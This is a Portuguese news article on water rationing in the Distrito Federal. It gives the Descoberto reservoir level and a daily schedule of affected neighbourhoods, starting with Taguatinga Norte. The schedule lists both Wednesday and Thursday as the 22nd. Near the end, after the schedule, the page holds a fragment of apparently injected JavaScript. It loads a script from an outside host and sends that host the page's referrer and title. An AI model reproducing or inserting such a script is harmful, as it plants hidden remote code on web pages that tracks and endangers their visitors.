Racionamento no DF atinge Taguatinga Norte nesta segunda; confira

 
 

O racionamento de água imposto pelo governo do Distrito Federal às regiões abastecidas pela bacia do Descoberto atinge a região de Taguatinga Norte nesta segunda-feira (20). As áreas atingidas incluem as quadras QNL/EQNL de 01 a 08 e de 10 a 12.

Isso significa que, a partir das 8h, imóveis residenciais, comerciais e públicos localizados nesta região terão o abastecimento interrompido. O corte no fornecimento dura 24 horas e só será retomado a partir de terça. Como o ligamento é gradual, a água pode demorar a voltar até o fim de quarta.

Neste domingo, o volume total de água do Descoberto chegou a 37,38%. Este é o maior índice alcançado desde novembro do ano passado. Apesar do crescimento, o nível ainda é considerado preocupante.

Maior tanque do DF, o Descoberto abastece cerca de dois terços da população total da capital, que é de 2,9 milhões de pessoas. Os demais moradores, abastecidos pelo reservatório do Santa Maria, não sofrem racionamento, mas estão submetidos à redução de pressão.

Apesar do aumento no nível do reservatório, a rede de abastecimento do DF precisa de muito mais para sair da crise. A zona de perigo só acaba quando o Descoberto alcançar o índice de 60%. Esse volume não é alcançado por nenhum dos dois reservatórios da cidade desde agosto.

Confira a rotação do racionamento de água para os próximos dias no DF:

Segunda (20)
Taguatinga Norte (incluindo QNL/EQNL 01 a 08, 10 e 12)

Terça (21)
Ceilândia Oeste, Recanto das Emas e Riacho Fundo II

Quarta (22)
Vicente Pires, Colônia Agrícola Samambaia, Vila São José, Jóquei, Santa Maria, DVO, Sítio do Gama, Polo JK e Residencial Santa Maria

Quinta (22)
Gama

Sexta (23)
Ceilândia Leste, QNM, QNJ e QNL; Águas Claras, Park Way, Núcleo Bandeirante, C.A. IAPI, Candangolândia, Setor de Postos e Motéis, Metropolitana, Samambaia, Setor de Mansões de Taguatinga, Vila Cauhy e Vargem Bonita.

Sábado (24)
Guará I e II, Polo de Modas, Colônia Agrícola Bernardo Sayão, setor Lúcio Costa, Super Quadra Brasília, Colônia Agrícola Águas Claras, Taguatinga Sul, Arniqueiras, Areal e Riacho Fundo I

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário